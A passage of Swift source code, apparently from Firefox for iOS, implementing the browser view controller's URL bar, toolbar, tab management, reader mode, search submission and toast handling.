}
fileprivate func popToBVC() {
guard let currentViewController = navigationController?.topViewController else {
return
}
currentViewController.dismiss(animated: true, completion: nil)
if currentViewController != self {
_ = self.navigationController?.popViewController(animated: true)
} else if urlBar.inOverlayMode {
urlBar.didClickCancel()
}
}
// MARK: User Agent Spoofing
func resetSpoofedUserAgentIfRequired(_ webView: WKWebView, newURL: URL) {
// Reset the UA when a different domain is being loaded
if webView.url?.host != newURL.host {
webView.customUserAgent = nil
}
}
func restoreSpoofedUserAgentIfRequired(_ webView: WKWebView, newRequest: URLRequest) {
// Restore any non-default UA from the request's header
let ua = newRequest.value(forHTTPHeaderField: "User-Agent")
webView.customUserAgent = ua != UserAgent.defaultUserAgent() ? ua : nil
}
fileprivate func presentActivityViewController(_ url: URL, tab: Tab? = nil, sourceView: UIView?, sourceRect: CGRect, arrowDirection: UIPopoverArrowDirection) {
let helper = ShareExtensionHelper(url: url, tab: tab)
let controller = helper.createActivityViewController({ [unowned self] completed, _ in
// After dismissing, check to see if there were any prompts we queued up
self.showQueuedAlertIfAvailable()
// Usually the popover delegate would handle nil'ing out the references we have to it
// on the BVC when displaying as a popover but the delegate method doesn't seem to be
// invoked on iOS 10. See Bug 1297768 for additional details.
self.displayedPopoverController = nil
self.updateDisplayedPopoverProperties = nil
})
if let popoverPresentationController = controller.popoverPresentationController {
popoverPresentationController.sourceView = sourceView
popoverPresentationController.sourceRect = sourceRect
popoverPresentationController.permittedArrowDirections = arrowDirection
popoverPresentationController.delegate = self
}
present(controller, animated: true, completion: nil)
LeanPlumClient.shared.track(event: .userSharedWebpage)
}
@objc fileprivate func openSettings() {
assert(Thread.isMainThread, "Opening settings requires being invoked on the main thread")
let settingsTableViewController = AppSettingsTableViewController()
settingsTableViewController.profile = profile
settingsTableViewController.tabManager = tabManager
settingsTableViewController.settingsDelegate = self
let controller = ThemedNavigationController(rootViewController: settingsTableViewController)
controller.popoverDelegate = self
controller.modalPresentationStyle = .formSheet
self.present(controller, animated: true, completion: nil)
}
fileprivate func postLocationChangeNotificationForTab(_ tab: Tab, navigation: WKNavigation?) {
let notificationCenter = NotificationCenter.default
var info = [AnyHashable: Any]()
info["url"] = tab.url?.displayURL
info["title"] = tab.title
if let visitType = self.getVisitTypeForTab(tab, navigation: navigation)?.rawValue {
info["visitType"] = visitType
}
info["isPrivate"] = tab.isPrivate
notificationCenter.post(name: .OnLocationChange, object: self, userInfo: info)
}
func navigateInTab(tab: Tab, to navigation: WKNavigation? = nil) {
tabManager.expireSnackbars()
guard let webView = tab.webView else {
print("Cannot navigate in tab without a webView")
return
}
if let url = webView.url {
if !url.isErrorPageURL, !url.isAboutHomeURL, !url.isFileURL {
postLocationChangeNotificationForTab(tab, navigation: navigation)
// Fire the readability check. This is here and not in the pageShow event handler in ReaderMode.js anymore
// because that event wil not always fire due to unreliable page caching. This will either let us know that
// the currently loaded page can be turned into reading mode or if the page already is in reading mode. We
// ignore the result because we are being called back asynchronous when the readermode status changes.
webView.evaluateJavaScript("\(ReaderModeNamespace).checkReadability()", completionHandler: nil)
// Re-run additional scripts in webView to extract updated favicons and metadata.
runScriptsOnWebView(webView)
}
TabEvent.post(.didChangeURL(url), for: tab)
}
if tab === tabManager.selectedTab {
UIAccessibilityPostNotification(UIAccessibilityScreenChangedNotification, nil)
// must be followed by LayoutChanged, as ScreenChanged will make VoiceOver
// cursor land on the correct initial element, but if not followed by LayoutChanged,
// VoiceOver will sometimes be stuck on the element, not allowing user to move
// forward/backward. Strange, but LayoutChanged fixes that.
UIAccessibilityPostNotification(UIAccessibilityLayoutChangedNotification, nil)
} else if let webView = tab.webView {
// To Screenshot a tab that is hidden we must add the webView,
// then wait enough time for the webview to render.
view.insertSubview(webView, at: 0)
// This is kind of a hacky fix for Bug 1476637 to prevent webpages from focusing the
// touch-screen keyboard from the background even though they shouldn't be able to.
webView.resignFirstResponder()
DispatchQueue.main.asyncAfter(deadline: .now() + .milliseconds(500)) {
self.screenshotHelper.takeScreenshot(tab)
if webView.superview == self.view {
webView.removeFromSuperview()
}
}
}
// Remember whether or not a desktop site was requested
tab.desktopSite = webView.customUserAgent?.isEmpty == false
}
}
extension BrowserViewController: ClipboardBarDisplayHandlerDelegate {
func shouldDisplay(clipboardBar bar: ButtonToast) {
show(toast: bar, duration: ClipboardBarToastUX.ToastDelay)
}
}
extension BrowserViewController: QRCodeViewControllerDelegate {
func didScanQRCodeWithURL(_ url: URL) {
guard let tab = tabManager.selectedTab else { return }
openBlankNewTab(focusLocationField: false)
finishEditingAndSubmit(url, visitType: VisitType.typed, forTab: tab)
UnifiedTelemetry.recordEvent(category: .action, method: .scan, object: .qrCodeURL)
}
func didScanQRCodeWithText(_ text: String) {
guard let tab = tabManager.selectedTab else { return }
openBlankNewTab(focusLocationField: false)
submitSearchText(text, forTab: tab)
UnifiedTelemetry.recordEvent(category: .action, method: .scan, object: .qrCodeText)
}
}
extension BrowserViewController: SettingsDelegate {
func settingsOpenURLInNewTab(_ url: URL) {
self.openURLInNewTab(url, isPrivileged: false)
}
}
extension BrowserViewController: PresentingModalViewControllerDelegate {
func dismissPresentedModalViewController(_ modalViewController: UIViewController, animated: Bool) {
self.dismiss(animated: animated, completion: nil)
}
}
/**
* History visit management.
* TODO: this should be expanded to track various visit types; see Bug 1166084.
*/
extension BrowserViewController {
func ignoreNavigationInTab(_ tab: Tab, navigation: WKNavigation) {
self.ignoredNavigation.insert(navigation)
}
func recordNavigationInTab(_ tab: Tab, navigation: WKNavigation, visitType: VisitType) {
self.typedNavigation[navigation] = visitType
}
/**
* Untrack and do the right thing.
*/
func getVisitTypeForTab(_ tab: Tab, navigation: WKNavigation?) -> VisitType? {
guard let navigation = navigation else {
// See https://github.com/WebKit/webkit/blob/master/Source/WebKit2/UIProcess/Cocoa/NavigationState.mm#L390
return VisitType.link
}
if let _ = self.ignoredNavigation.remove(navigation) {
return nil
}
return self.typedNavigation.removeValue(forKey: navigation) ?? VisitType.link
}
}
extension BrowserViewController: URLBarDelegate {
func showTabTray() {
Sentry.shared.clearBreadcrumbs()
updateFindInPageVisibility(visible: false)
let tabTrayController = TabTrayController(tabManager: tabManager, profile: profile, tabTrayDelegate: self)
if let tab = tabManager.selectedTab {
screenshotHelper.takeScreenshot(tab)
}
navigationController?.pushViewController(tabTrayController, animated: true)
self.tabTrayController = tabTrayController
}
func urlBarDidPressReload(_ urlBar: URLBarView) {
tabManager.selectedTab?.reload()
}
func urlBarDidPressQRButton(_ urlBar: URLBarView) {
let qrCodeViewController = QRCodeViewController()
qrCodeViewController.qrCodeDelegate = self
let controller = QRCodeNavigationController(rootViewController: qrCodeViewController)
self.present(controller, animated: true, completion: nil)
}
func urlBarDidPressPageOptions(_ urlBar: URLBarView, from button: UIButton) {
guard let tab = tabManager.selectedTab, let urlString = tab.url?.absoluteString, !urlBar.inOverlayMode else { return }
let actionMenuPresenter: (URL, Tab, UIView, UIPopoverArrowDirection) -> Void = { (url, tab, view, _) in
self.presentActivityViewController(url, tab: tab, sourceView: view, sourceRect: view.bounds, arrowDirection: .up)
}
let findInPageAction = {
self.updateFindInPageVisibility(visible: true)
}
let successCallback: (String) -> Void = { (successMessage) in
SimpleToast().showAlertWithText(successMessage, bottomContainer: self.webViewContainer)
}
let deferredBookmarkStatus: Deferred<Maybe<Bool>> = fetchBookmarkStatus(for: urlString)
let deferredPinnedTopSiteStatus: Deferred<Maybe<Bool>> = fetchPinnedTopSiteStatus(for: urlString)
// Wait for both the bookmark status and the pinned status
deferredBookmarkStatus.both(deferredPinnedTopSiteStatus).uponQueue(.main) {
let isBookmarked = $0.successValue ?? false
let isPinned = $1.successValue ?? false
let pageActions = self.getTabActions(tab: tab, buttonView: button, presentShareMenu: actionMenuPresenter,
findInPage: findInPageAction, presentableVC: self, isBookmarked: isBookmarked,
isPinned: isPinned, success: successCallback)
self.presentSheetWith(title: Strings.PageActionMenuTitle, actions: pageActions, on: self, from: button)
}
}
func urlBarDidLongPressPageOptions(_ urlBar: URLBarView, from button: UIButton) {
guard let tab = tabManager.selectedTab else { return }
guard let url = tab.canonicalURL?.displayURL, self.presentedViewController == nil else {
return
}
let generator = UIImpactFeedbackGenerator(style: .heavy)
generator.impactOccurred()
presentActivityViewController(url, tab: tab, sourceView: button, sourceRect: button.bounds, arrowDirection: .up)
}
func urlBarDidTapShield(_ urlBar: URLBarView, from button: UIButton) {
if let tab = self.tabManager.selectedTab {
let trackingProtectionMenu = self.getTrackingSubMenu(for: tab)
guard !trackingProtectionMenu.isEmpty else { return }
self.presentSheetWith(actions: trackingProtectionMenu, on: self, from: urlBar)
}
}
func urlBarDidPressStop(_ urlBar: URLBarView) {
tabManager.selectedTab?.stop()
}
func urlBarDidPressTabs(_ urlBar: URLBarView) {
showTabTray()
}
func urlBarDidPressReaderMode(_ urlBar: URLBarView) {
if let tab = tabManager.selectedTab {
if let readerMode = tab.getContentScript(name: "ReaderMode") as? ReaderMode {
switch readerMode.state {
case .available:
enableReaderMode()
UnifiedTelemetry.recordEvent(category: .action, method: .tap, object: .readerModeOpenButton)
LeanPlumClient.shared.track(event: .useReaderView)
case .active:
disableReaderMode()
UnifiedTelemetry.recordEvent(category: .action, method: .tap, object: .readerModeCloseButton)
case .unavailable:
break
}
}
}
}
func urlBarDidLongPressReaderMode(_ urlBar: URLBarView) -> Bool {
guard let tab = tabManager.selectedTab,
let url = tab.url?.displayURL
else {
UIAccessibilityPostNotification(UIAccessibilityAnnouncementNotification, NSLocalizedString("Could not add page to Reading list", comment: "Accessibility message e.g. spoken by VoiceOver after adding current webpage to the Reading List failed."))
return false
}
let result = profile.readingList.createRecordWithURL(url.absoluteString, title: tab.title ?? "", addedBy: UIDevice.current.name)
switch result.value {
case .success:
UIAccessibilityPostNotification(UIAccessibilityAnnouncementNotification, NSLocalizedString("Added page to Reading List", comment: "Accessibility message e.g. spoken by VoiceOver after the current page gets added to the Reading List using the Reader View button, e.g. by long-pressing it or by its accessibility custom action."))
// TODO: https://bugzilla.mozilla.org/show_bug.cgi?id=1158503 provide some form of 'this has been added' visual feedback?
case .failure(let error):
UIAccessibilityPostNotification(UIAccessibilityAnnouncementNotification, NSLocalizedString("Could not add page to Reading List. Maybe it’s already there?", comment: "Accessibility message e.g. spoken by VoiceOver after the user wanted to add current page to the Reading List and this was not done, likely because it already was in the Reading List, but perhaps also because of real failures."))
print("readingList.createRecordWithURL(url: \"\(url.absoluteString)\", ...) failed with error: \(error)")
}
return true
}
func locationActionsForURLBar(_ urlBar: URLBarView) -> [AccessibleAction] {
if UIPasteboard.general.string != nil {
return [pasteGoAction, pasteAction, copyAddressAction]
} else {
return [copyAddressAction]
}
}
func urlBarDisplayTextForURL(_ url: URL?) -> (String?, Bool) {
// use the initial value for the URL so we can do proper pattern matching with search URLs
var searchURL = self.tabManager.selectedTab?.currentInitialURL
if searchURL?.isErrorPageURL ?? true {
searchURL = url
}
if let query = profile.searchEngines.queryForSearchURL(searchURL as URL?) {
return (query, true)
} else {
return (url?.absoluteString, false)
}
}
func urlBarDidLongPressLocation(_ urlBar: URLBarView) {
let urlActions = self.getLongPressLocationBarActions(with: urlBar)
let generator = UIImpactFeedbackGenerator(style: .heavy)
generator.impactOccurred()
if let tab = self.tabManager.selectedTab {
let trackingProtectionMenu = self.getTrackingMenu(for: tab, presentingOn: urlBar)
self.presentSheetWith(actions: [urlActions, trackingProtectionMenu], on: self, from: urlBar)
} else {
self.presentSheetWith(actions: [urlActions], on: self, from: urlBar)
}
}
func urlBarDidPressScrollToTop(_ urlBar: URLBarView) {
if let selectedTab = tabManager.selectedTab, homePanelController == nil {
// Only scroll to top if we are not showing the home view controller
selectedTab.webView?.scrollView.setContentOffset(CGPoint.zero, animated: true)
}
}
func urlBarLocationAccessibilityActions(_ urlBar: URLBarView) -> [UIAccessibilityCustomAction]? {
return locationActionsForURLBar(urlBar).map { $0.accessibilityCustomAction }
}
func urlBar(_ urlBar: URLBarView, didEnterText text: String) {
if text.isEmpty {
hideSearchController()
} else {
showSearchController()
searchController?.searchQuery = text
searchLoader?.query = text
}
}
func urlBar(_ urlBar: URLBarView, didSubmitText text: String) {
guard let currentTab = tabManager.selectedTab else { return }
if let fixupURL = URIFixup.getURL(text) {
// The user entered a URL, so use it.
finishEditingAndSubmit(fixupURL, visitType: VisitType.typed, forTab: currentTab)
return
}
// We couldn't build a URL, so check for a matching search keyword.
let trimmedText = text.trimmingCharacters(in: .whitespaces)
guard let possibleKeywordQuerySeparatorSpace = trimmedText.index(of: " ") else {
submitSearchText(text, forTab: currentTab)
return
}
let possibleKeyword = String(trimmedText[..<possibleKeywordQuerySeparatorSpace])
let possibleQuery = String(trimmedText[trimmedText.index(after: possibleKeywordQuerySeparatorSpace)...])
profile.bookmarks.getURLForKeywordSearch(possibleKeyword).uponQueue(.main) { result in
if var urlString = result.successValue,
let escapedQuery = possibleQuery.addingPercentEncoding(withAllowedCharacters: NSCharacterSet.urlQueryAllowed),
let range = urlString.range(of: "%s") {
urlString.replaceSubrange(range, with: escapedQuery)
if let url = URL(string: urlString) {
self.finishEditingAndSubmit(url, visitType: VisitType.typed, forTab: currentTab)
return
}
}
self.submitSearchText(text, forTab: currentTab)
}
}
fileprivate func submitSearchText(_ text: String, forTab tab: Tab) {
let engine = profile.searchEngines.defaultEngine
if let searchURL = engine.searchURLForQuery(text) {
// We couldn't find a matching search keyword, so do a search query.
Telemetry.default.recordSearch(location: .actionBar, searchEngine: engine.engineID ?? "other")
finishEditingAndSubmit(searchURL, visitType: VisitType.typed, forTab: tab)
} else {
// We still don't have a valid URL, so something is broken. Give up.
print("Error handling URL entry: \"\(text)\".")
assertionFailure("Couldn't generate search URL: \(text)")
}
}
func urlBarDidEnterOverlayMode(_ urlBar: URLBarView) {
guard let profile = profile as? BrowserProfile else {
return
}
if .blankPage == NewTabAccessors.getNewTabPage(profile.prefs) {
UIAccessibilityPostNotification(UIAccessibilityScreenChangedNotification, nil)
} else {
if let toast = clipboardBarDisplayHandler?.clipboardToast {
toast.removeFromSuperview()
}
showHomePanelController(inline: false)
}
LeanPlumClient.shared.track(event: .interactWithURLBar)
}
func urlBarDidLeaveOverlayMode(_ urlBar: URLBarView) {
hideSearchController()
updateInContentHomePanel(tabManager.selectedTab?.url as URL?)
}
func urlBarDidBeginDragInteraction(_ urlBar: URLBarView) {
dismissVisibleMenus()
}
}
extension BrowserViewController: TabToolbarDelegate, PhotonActionSheetProtocol {
func tabToolbarDidPressBack(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
tabManager.selectedTab?.goBack()
}
func tabToolbarDidLongPressBack(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
let generator = UIImpactFeedbackGenerator(style: .heavy)
generator.impactOccurred()
showBackForwardList()
}
func tabToolbarDidPressReload(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
tabManager.selectedTab?.reload()
}
func tabToolbarDidLongPressReload(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
guard let tab = tabManager.selectedTab else {
return
}
let urlActions = self.getRefreshLongPressMenu(for: tab)
guard !urlActions.isEmpty else {
return
}
let generator = UIImpactFeedbackGenerator(style: .heavy)
generator.impactOccurred()
let shouldSuppress = !topTabsVisible && UIDevice.current.userInterfaceIdiom == .pad
presentSheetWith(actions: [urlActions], on: self, from: button, suppressPopover: shouldSuppress)
}
func tabToolbarDidPressStop(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
tabManager.selectedTab?.stop()
}
func tabToolbarDidPressForward(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
tabManager.selectedTab?.goForward()
}
func tabToolbarDidLongPressForward(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
let generator = UIImpactFeedbackGenerator(style: .heavy)
generator.impactOccurred()
showBackForwardList()
}
func tabToolbarDidPressMenu(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
// ensure that any keyboards or spinners are dismissed before presenting the menu
UIApplication.shared.sendAction(#selector(UIResponder.resignFirstResponder), to: nil, from: nil, for: nil)
var actions: [[PhotonActionSheetItem]] = []
if let syncAction = syncMenuButton(showFxA: presentSignInViewController) {
actions.append(syncAction)
}
actions.append(getLibraryActions(vcDelegate: self))
actions.append(getOtherPanelActions(vcDelegate: self))
// force a modal if the menu is being displayed in compact split screen
let shouldSuppress = !topTabsVisible && UIDevice.current.userInterfaceIdiom == .pad
presentSheetWith(actions: actions, on: self, from: button, suppressPopover: shouldSuppress)
}
func tabToolbarDidPressTabs(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
showTabTray()
}
func getTabToolbarLongPressActionsForModeSwitching() -> [PhotonActionSheetItem] {
guard let selectedTab = tabManager.selectedTab else { return [] }
let count = selectedTab.isPrivate ? tabManager.normalTabs.count : tabManager.privateTabs.count
let infinity = "\u{221E}"
let tabCount = (count < 100) ? count.description : infinity
func action() {
let result = tabManager.switchPrivacyMode()
if result == .createdNewTab, NewTabAccessors.getNewTabPage(self.profile.prefs) == .blankPage {
focusLocationTextField(forTab: tabManager.selectedTab)
}
}
let privateBrowsingMode = PhotonActionSheetItem(title: Strings.privateBrowsingModeTitle, iconString: "nav-tabcounter", iconType: .TabsButton, tabCount: tabCount) { _ in
action()
}
let normalBrowsingMode = PhotonActionSheetItem(title: Strings.normalBrowsingModeTitle, iconString: "nav-tabcounter", iconType: .TabsButton, tabCount: tabCount) { _ in
action()
}
if let tab = self.tabManager.selectedTab {
return tab.isPrivate ? [normalBrowsingMode] : [privateBrowsingMode]
}
return [privateBrowsingMode]
}
func getMoreTabToolbarLongPressActions() -> [PhotonActionSheetItem] {
let newTab = PhotonActionSheetItem(title: Strings.NewTabTitle, iconString: "quick_action_new_tab", iconType: .Image) { action in
let shouldFocusLocationField = NewTabAccessors.getNewTabPage(self.profile.prefs) == .blankPage
self.openBlankNewTab(focusLocationField: shouldFocusLocationField, isPrivate: false)}
let newPrivateTab = PhotonActionSheetItem(title: Strings.NewPrivateTabTitle, iconString: "quick_action_new_tab", iconType: .Image) { action in
let shouldFocusLocationField = NewTabAccessors.getNewTabPage(self.profile.prefs) == .blankPage
self.openBlankNewTab(focusLocationField: shouldFocusLocationField, isPrivate: true)}
let closeTab = PhotonActionSheetItem(title: Strings.CloseTabTitle, iconString: "tab_close", iconType: .Image) { action in
if let tab = self.tabManager.selectedTab {
self.tabManager.removeTabAndUpdateSelectedIndex(tab)
self.updateTabCountUsingTabManager(self.tabManager)
}}
if let tab = self.tabManager.selectedTab {
return tab.isPrivate ? [newPrivateTab, closeTab] : [newTab, closeTab]
}
return [newTab, closeTab]
}
func tabToolbarDidLongPressTabs(_ tabToolbar: TabToolbarProtocol, button: UIButton) {
guard self.presentedViewController == nil else {
return
}
var actions: [[PhotonActionSheetItem]] = []
actions.append(getTabToolbarLongPressActionsForModeSwitching())
actions.append(getMoreTabToolbarLongPressActions())
// Force a modal if the menu is being displayed in compact split screen.
let shouldSuppress = !topTabsVisible && UIDevice.current.userInterfaceIdiom == .pad
let generator = UIImpactFeedbackGenerator(style: .heavy)
generator.impactOccurred()
presentSheetWith(actions: actions, on: self, from: button, suppressPopover: shouldSuppress)
}
func showBackForwardList() {
if let backForwardList = tabManager.selectedTab?.webView?.backForwardList {
let backForwardViewController = BackForwardListViewController(profile: profile, backForwardList: backForwardList)
backForwardViewController.tabManager = tabManager
backForwardViewController.bvc = self
backForwardViewController.modalPresentationStyle = .overCurrentContext
backForwardViewController.backForwardTransitionDelegate = BackForwardListAnimator()
self.present(backForwardViewController, animated: true, completion: nil)
}
}
}
extension BrowserViewController: TabDelegate {
func tab(_ tab: Tab, didCreateWebView webView: WKWebView) {
webView.frame = webViewContainer.frame
// Observers that live as long as the tab. Make sure these are all cleared in willDeleteWebView below!
KVOs.forEach { webView.addObserver(self, forKeyPath: $0.rawValue, options: .new, context: nil) }
webView.scrollView.addObserver(self.scrollController, forKeyPath: KVOConstants.contentSize.rawValue, options: .new, context: nil)
webView.uiDelegate = self
let formPostHelper = FormPostHelper(tab: tab)
tab.addContentScript(formPostHelper, name: FormPostHelper.name())
let readerMode = ReaderMode(tab: tab)
readerMode.delegate = self
tab.addContentScript(readerMode, name: ReaderMode.name())
// only add the logins helper if the tab is not a private browsing tab
if !tab.isPrivate {
let logins = LoginsHelper(tab: tab, profile: profile)
tab.addContentScript(logins, name: LoginsHelper.name())
}
let contextMenuHelper = ContextMenuHelper(tab: tab)
contextMenuHelper.delegate = self
tab.addContentScript(contextMenuHelper, name: ContextMenuHelper.name())
let errorHelper = ErrorPageHelper()
tab.addContentScript(errorHelper, name: ErrorPageHelper.name())
let sessionRestoreHelper = SessionRestoreHelper(tab: tab)
sessionRestoreHelper.delegate = self
tab.addContentScript(sessionRestoreHelper, name: SessionRestoreHelper.name())
let findInPageHelper = FindInPageHelper(tab: tab)
findInPageHelper.delegate = self
tab.addContentScript(findInPageHelper, name: FindInPageHelper.name())
let noImageModeHelper = NoImageModeHelper(tab: tab)
tab.addContentScript(noImageModeHelper, name: NoImageModeHelper.name())
let downloadContentScript = DownloadContentScript(tab: tab)
tab.addContentScript(downloadContentScript, name: DownloadContentScript.name())
let printHelper = PrintHelper(tab: tab)
tab.addContentScript(printHelper, name: PrintHelper.name())
let customSearchHelper = CustomSearchHelper(tab: tab)
tab.addContentScript(customSearchHelper, name: CustomSearchHelper.name())
let nightModeHelper = NightModeHelper(tab: tab)
tab.addContentScript(nightModeHelper, name: NightModeHelper.name())
// XXX: Bug 1390200 - Disable NSUserActivity/CoreSpotlight temporarily
// let spotlightHelper = SpotlightHelper(tab: tab)
// tab.addHelper(spotlightHelper, name: SpotlightHelper.name())
tab.addContentScript(LocalRequestHelper(), name: LocalRequestHelper.name())
let historyStateHelper = HistoryStateHelper(tab: tab)
historyStateHelper.delegate = self
tab.addContentScript(historyStateHelper, name: HistoryStateHelper.name())
let blocker = FirefoxTabContentBlocker(tab: tab, prefs: profile.prefs)
tab.contentBlocker = blocker
tab.addContentScript(blocker, name: FirefoxTabContentBlocker.name())
tab.addContentScript(FocusHelper(tab: tab), name: FocusHelper.name())
}
func tab(_ tab: Tab, willDeleteWebView webView: WKWebView) {
tab.cancelQueuedAlerts()
KVOs.forEach { webView.removeObserver(self, forKeyPath: $0.rawValue) }
webView.scrollView.removeObserver(self.scrollController, forKeyPath: KVOConstants.contentSize.rawValue)
webView.uiDelegate = nil
webView.scrollView.delegate = nil
webView.removeFromSuperview()
}
fileprivate func findSnackbar(_ barToFind: SnackBar) -> Int? {
let bars = alertStackView.arrangedSubviews
for (index, bar) in bars.enumerated() where bar === barToFind {
return index
}
return nil
}
func showBar(_ bar: SnackBar, animated: Bool) {
view.layoutIfNeeded()
UIView.animate(withDuration: animated ? 0.25 : 0, animations: {
self.alertStackView.insertArrangedSubview(bar, at: 0)
self.view.layoutIfNeeded()
})
}
func removeBar(_ bar: SnackBar, animated: Bool) {
UIView.animate(withDuration: animated ? 0.25 : 0, animations: {
bar.removeFromSuperview()
})
}
func removeAllBars() {
alertStackView.arrangedSubviews.forEach { $0.removeFromSuperview() }
}
func tab(_ tab: Tab, didAddSnackbar bar: SnackBar) {
showBar(bar, animated: true)
}
func tab(_ tab: Tab, didRemoveSnackbar bar: SnackBar) {
removeBar(bar, animated: true)
}
func tab(_ tab: Tab, didSelectFindInPageForSelection selection: String) {
updateFindInPageVisibility(visible: true)
findInPageBar?.text = selection
}
func tab(_ tab: Tab, didSelectSearchWithFirefoxForSelection selection: String) {
openSearchNewTab(isPrivate: tab.isPrivate, selection)
}
}
extension BrowserViewController: HomePanelDelegate {
func homePanelDidRequestToSignIn() {
let fxaParams = FxALaunchParams(query: ["entrypoint": "homepanel"])
presentSignInViewController(fxaParams) // TODO UX Right now the flow for sign in and create account is the same
}
func homePanelDidRequestToCreateAccount() {
let fxaParams = FxALaunchParams(query: ["entrypoint": "homepanel"])
presentSignInViewController(fxaParams) // TODO UX Right now the flow for sign in and create account is the same
}
func homePanel(didSelectURL url: URL, visitType: VisitType) {
guard let tab = tabManager.selectedTab else { return }
finishEditingAndSubmit(url, visitType: visitType, forTab: tab)
}
func homePanel(didSelectURLString url: String, visitType: VisitType) {
guard let url = URIFixup.getURL(url) ?? profile.searchEngines.defaultEngine.searchURLForQuery(url) else {
Logger.browserLogger.warning("Invalid URL, and couldn't generate a search URL for it.")
return
}
return self.homePanel(didSelectURL: url, visitType: visitType)
}
func homePanelDidRequestToOpenInNewTab(_ url: URL, isPrivate: Bool) {
let tab = self.tabManager.addTab(PrivilegedRequest(url: url) as URLRequest, afterTab: self.tabManager.selectedTab, isPrivate: isPrivate)
// If we are showing toptabs a user can just use the top tab bar
// If in overlay mode switching doesnt correctly dismiss the homepanels
guard !topTabsVisible, !self.urlBar.inOverlayMode else {
return
}
// We're not showing the top tabs; show a toast to quick switch to the fresh new tab.
let toast = ButtonToast(labelText: Strings.ContextMenuButtonToastNewTabOpenedLabelText, buttonText: Strings.ContextMenuButtonToastNewTabOpenedButtonText, completion: { buttonPressed in
if buttonPressed {
self.tabManager.selectTab(tab)
}
})
self.show(toast: toast)
}
}
extension BrowserViewController: SearchViewControllerDelegate {
func searchViewController(_ searchViewController: SearchViewController, didSelectURL url: URL) {
guard let tab = tabManager.selectedTab else { return }
finishEditingAndSubmit(url, visitType: VisitType.typed, forTab: tab)
}
func searchViewController(_ searchViewController: SearchViewController, didLongPressSuggestion suggestion: String) {
self.urlBar.setLocation(suggestion, search: true)
}
func presentSearchSettingsController() {
let ThemedNavigationController = SearchSettingsTableViewController()
ThemedNavigationController.model = self.profile.searchEngines
ThemedNavigationController.profile = self.profile
let navController = ModalSettingsNavigationController(rootViewController: ThemedNavigationController)
self.present(navController, animated: true, completion: nil)
}
func searchViewController(_ searchViewController: SearchViewController, didHighlightText text: String, search: Bool) {
self.urlBar.setLocation(text, search: search)
}
}
extension BrowserViewController: TabManagerDelegate {
func tabManager(_ tabManager: TabManager, didSelectedTabChange selected: Tab?, previous: Tab?, isRestoring: Bool) {
// Remove the old accessibilityLabel. Since this webview shouldn't be visible, it doesn't need it
// and having multiple views with the same label confuses tests.
if let wv = previous?.webView {
wv.endEditing(true)
wv.accessibilityLabel = nil
wv.accessibilityElementsHidden = true
wv.accessibilityIdentifier = nil
wv.removeFromSuperview()
}
if let tab = selected, let webView = tab.webView {
updateURLBarDisplayURL(tab)
if previous == nil || tab.isPrivate != previous?.isPrivate {
applyTheme()
let ui: [PrivateModeUI?] = [toolbar, topTabsViewController, urlBar]
ui.forEach { $0?.applyUIMode(isPrivate: tab.isPrivate) }
}
readerModeCache = tab.isPrivate ? MemoryReaderModeCache.sharedInstance : DiskReaderModeCache.sharedInstance
if let privateModeButton = topTabsViewController?.privateModeButton, previous != nil && previous?.isPrivate != tab.isPrivate {
privateModeButton.setSelected(tab.isPrivate, animated: true)
}
ReaderModeHandlers.readerModeCache = readerModeCache
scrollController.tab = selected
webViewContainer.addSubview(webView)
webView.snp.makeConstraints { make in
make.left.right.top.bottom.equalTo(self.webViewContainer)
}
webView.accessibilityLabel = NSLocalizedString("Web content", comment: "Accessibility label for the main web content view")
webView.accessibilityIdentifier = "contentView"
webView.accessibilityElementsHidden = false
if webView.url == nil {
// The web view can go gray if it was zombified due to memory pressure.
// When this happens, the URL is nil, so try restoring the page upon selection.
tab.reload()
}
}
updateTabCountUsingTabManager(tabManager)
removeAllBars()
if let bars = selected?.bars {
for bar in bars {
showBar(bar, animated: true)
}
}
updateFindInPageVisibility(visible: false, tab: previous)
navigationToolbar.updateReloadStatus(selected?.loading ?? false)
navigationToolbar.updateBackStatus(selected?.canGoBack ?? false)
navigationToolbar.updateForwardStatus(selected?.canGoForward ?? false)
if !(selected?.webView?.url?.isLocalUtility ?? false) {
self.urlBar.updateProgressBar(Float(selected?.estimatedProgress ?? 0))
}
if let readerMode = selected?.getContentScript(name: ReaderMode.name()) as? ReaderMode {
urlBar.updateReaderModeState(readerMode.state)
if readerMode.state == .active {
showReaderModeBar(animated: false)
} else {
hideReaderModeBar(animated: false)
}
} else {
urlBar.updateReaderModeState(ReaderModeState.unavailable)
}
if topTabsVisible {
topTabsDidChangeTab()
}
updateInContentHomePanel(selected?.url as URL?)
if let tab = selected, tab.url == nil, !tab.restoring, NewTabAccessors.getNewTabPage(self.profile.prefs) == .blankPage {
self.urlBar.tabLocationViewDidTapLocation(self.urlBar.locationView)
}
}
func tabManager(_ tabManager: TabManager, willAddTab tab: Tab) {
}
func tabManager(_ tabManager: TabManager, didAddTab tab: Tab, isRestoring: Bool) {
// If we are restoring tabs then we update the count once at the end
if !isRestoring {
updateTabCountUsingTabManager(tabManager)
}
tab.tabDelegate = self
}
func tabManager(_ tabManager: TabManager, willRemoveTab tab: Tab) {
if let url = tab.url, !url.isAboutURL && !tab.isPrivate {
profile.recentlyClosedTabs.addTab(url as URL, title: tab.title, faviconURL: tab.displayFavicon?.url)
}
}
func tabManager(_ tabManager: TabManager, didRemoveTab tab: Tab, isRestoring: Bool) {
updateTabCountUsingTabManager(tabManager)
}
func tabManagerDidAddTabs(_ tabManager: TabManager) {
updateTabCountUsingTabManager(tabManager)
}
func tabManagerDidRestoreTabs(_ tabManager: TabManager) {
updateTabCountUsingTabManager(tabManager)
}
func show(toast: Toast, afterWaiting delay: DispatchTimeInterval = SimpleToastUX.ToastDelayBefore, duration: DispatchTimeInterval? = SimpleToastUX.ToastDismissAfter) {
if let downloadToast = toast as? DownloadToast {
self.downloadToast = downloadToast
}
// If BVC isnt visible hold on to this toast until viewDidAppear
if self.view.window == nil {
self.pendingToast = toast
return
}
toast.showToast(viewController: self, delay: delay, duration: duration, makeConstraints: { make in
make.left.right.equalTo(self.view)
make.bottom.equalTo(self.webViewContainer?.safeArea.bottom ?? 0)
})
}
